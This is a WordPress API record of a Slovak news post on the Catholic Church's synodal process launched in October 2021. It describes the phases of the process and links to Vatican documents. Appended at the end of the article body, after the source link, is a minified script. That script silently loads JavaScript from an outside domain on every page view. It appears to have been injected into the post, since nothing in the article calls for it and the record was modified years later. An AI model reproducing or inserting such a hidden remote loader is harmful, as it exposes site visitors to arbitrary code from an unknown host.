{"id":30762,"date":"2021-10-17T12:45:04","date_gmt":"2021-10-17T11:45:04","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=30762"},"modified":"2026-03-30T10:43:15","modified_gmt":"2026-03-30T09:43:15","slug":"zacina-sa-najvacsia-diskusia-v-historii-cirkvi","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=30762","title":{"rendered":"ZA\u010c\u00cdNA SA NAJV\u00c4\u010c\u0160IA DISKUSIA V HIST\u00d3RII CIRKVI"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-thumbnail wp-image-30763\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2021\/10\/Synodal-Pathway-pope-150x150.png\" alt=\"Synodal Pathway pope\" width=\"150\" height=\"150\" \/><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: justify;\">U\u017e t\u00fato\u00a0nede\u013eu (17.10.2021) vstupuje Katol\u00edcka cirkev do trojro\u010dn\u00e9ho synod\u00e1lneho procesu. Sl\u00e1vnostn\u00fdm za\u010diatkom bola sv\u00e4t\u00e1 om\u0161a s\u00a0p\u00e1pe\u017eom Franti\u0161kom v\u00a0Bazilike sv\u00e4t\u00e9ho Petra.<\/p>\n<p style=\"text-align: justify;\"><strong>.<\/strong><\/p>\n<p style=\"text-align: right;\">Ilustra\u010dn\u00e9 foto: TASR\/AP<\/p>\n<p style=\"text-align: left;\"><strong>O\u00a0\u010do ide<\/strong><\/p>\n<p style=\"text-align: justify;\">O\u00a0synod\u00e1lnej ceste sa dnes hovor\u00ed najm\u00e4 v\u00a0s\u00favislosti s\u00a0Nemeckom, kde sa v\u00a0roku 2019\u00a0<a href=\"https:\/\/svetkrestanstva.postoj.sk\/89725\/druhe-zhromazdenie-skoncilo-chaosom-proces-kritizuje-uz-aj-kardinal-kasper\">za\u010dal proces obnovy miestnej cirkvi<\/a>, ktor\u00fd sprev\u00e1dzaj\u00fa mnoh\u00e9 kontroverzie. Na reformn\u00fa synod\u00e1lnu cestu sa v\u0161ak vydali aj cirkvi v\u00a0in\u00fdch krajin\u00e1ch,\u00a0<a href=\"https:\/\/www.vaticannews.va\/sk\/cirkev\/news\/2021-06\/rozhovor-talianski-biskupi-pripravuju-synodalnu-cestu.html\">napr\u00edklad v\u00a0Taliansku<\/a>. Po\u010dn\u00fac najbli\u017e\u0161ou nede\u013eou sa t\u00e1to t\u00e9ma st\u00e1va celocirkevnou.<\/p>\n<p style=\"text-align: justify;\">P\u00e1pe\u017e Franti\u0161ek po skon\u010den\u00ed poslednej synody biskupov o\u00a0Amaz\u00f3nii v\u00a0roku 2019\u00a0<a href=\"https:\/\/www.vaticannews.va\/sk\/vatikan\/news\/2020-03\/papez-frantisek-urcil-temu-buducej-biskupskej-synody-za-synodal.html\">ozn\u00e1mil<\/a>, \u017ee t\u00e9ma \u010fal\u0161ej synody bude znie\u0165\u00a0<em>Za synod\u00e1lnu cirkev: spolo\u010denstvo, particip\u00e1cia a\u00a0misia<\/em>.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.vaticannews.va\/sk\/cirkev\/news\/2021-05\/synoda-2023-bude-mat-tri-fazy-zacne-sa-v-diecezach.html\">Nesk\u00f4r bolo upresnen\u00e9<\/a>, \u017ee nep\u00f4jde o\u00a0jednorazov\u00e9 (pribli\u017ene trojt\u00fd\u017ed\u0148ov\u00e9) zasadnutie, ako sme boli zvyknut\u00ed v\u00a0minulosti, ale o\u00a0trojro\u010dn\u00fd proces. Za\u010dne sa na \u00farovni diec\u00e9z (okt\u00f3ber 2021 \u2013 apr\u00edl 2022), pokra\u010dova\u0165 bude v\u00a0r\u00e1mci kontinentov (september 2022 \u2013 marec 2023) a\u00a0vyvrchol\u00ed z\u00e1vere\u010dn\u00fdm stretnut\u00edm biskupov v\u00a0R\u00edme (okt\u00f3ber 2023).<\/p>\n<p style=\"text-align: justify;\"><strong>Pre\u010do je to d\u00f4le\u017eit\u00e9<\/strong><\/p>\n<p style=\"text-align: justify;\">Za\u010d\u00edna sa najv\u00e4\u010d\u0161ia diskusia v\u00a0hist\u00f3rii Katol\u00edckej cirkvi, do ktorej sa m\u00f4\u017ee zapoji\u0165 ka\u017ed\u00fd jeden jej \u010dlen. V\u00a0diec\u00e9znej f\u00e1ze, do ktorej maj\u00fa by\u0165 zapojen\u00e9 aj jednotliv\u00e9 farnosti, sa tematicky bude vych\u00e1dza\u0165 z\u00a0<a href=\"https:\/\/press.vatican.va\/content\/salastampa\/it\/bollettino\/pubblico\/2021\/09\/07\/0540\/01156.html\">Pr\u00edpravn\u00e9ho dokumentu<\/a>, z\u00e1kladn\u00fa pomocn\u00fa pr\u00edru\u010dku predstavuje\u00a0<a href=\"https:\/\/press.vatican.va\/content\/salastampa\/it\/bollettino\/pubblico\/2021\/09\/07\/0541\/01166.html\">Vademecum<\/a>.<\/p>\n<p style=\"text-align: justify;\">Slovo synoda znamen\u00e1 \u201espolo\u010dne na ceste\u201c, tak\u017ee za\u010d\u00ednaj\u00faci synod\u00e1lny proces m\u00e1 pohn\u00fa\u0165 cirkev dopredu, aby vedela primerane reagova\u0165 na v\u00fdzvy 21. storo\u010dia. Z\u00e1rove\u0148 m\u00e1 nasmerova\u0165 jednotliv\u00fdch \u010dlenov cirkvi k\u00a0sebe navz\u00e1jom, aby ka\u017ed\u00fd dok\u00e1zal n\u00e1js\u0165 svoje konkr\u00e9tne miesto v\u00a0slu\u017ebe jedn\u00e9mu spolo\u010denstvu.<\/p>\n<p>.<\/p>\n<p>Zdroj: <a href=\"https:\/\/svetkrestanstva.postoj.sk\/89932\/zacina-sa-najvaecsia-diskusia-v-historii-cirkvi-na-slovensku-o-tom-nepocut\">https:\/\/svetkrestanstva.postoj.sk\/89932\/zacina-sa-najvaecsia-diskusia-v-historii-cirkvi-na-slovensku-o-tom-nepocut<\/a><script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; U\u017e t\u00fato\u00a0nede\u013eu (17.10.2021) vstupuje Katol\u00edcka cirkev do trojro\u010dn\u00e9ho synod\u00e1lneho procesu. Sl\u00e1vnostn\u00fdm za\u010diatkom bola sv\u00e4t\u00e1 om\u0161a s\u00a0p\u00e1pe\u017eom Franti\u0161kom v\u00a0Bazilike sv\u00e4t\u00e9ho Petra. . Ilustra\u010dn\u00e9 foto: TASR\/AP O\u00a0\u010do ide O\u00a0synod\u00e1lnej ceste sa&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=30762\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-30762","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/30762","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30762"}],"version-history":[{"count":3,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/30762\/revisions"}],"predecessor-version":[{"id":30766,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/30762\/revisions\/30766"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30762"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=30762"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=30762"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}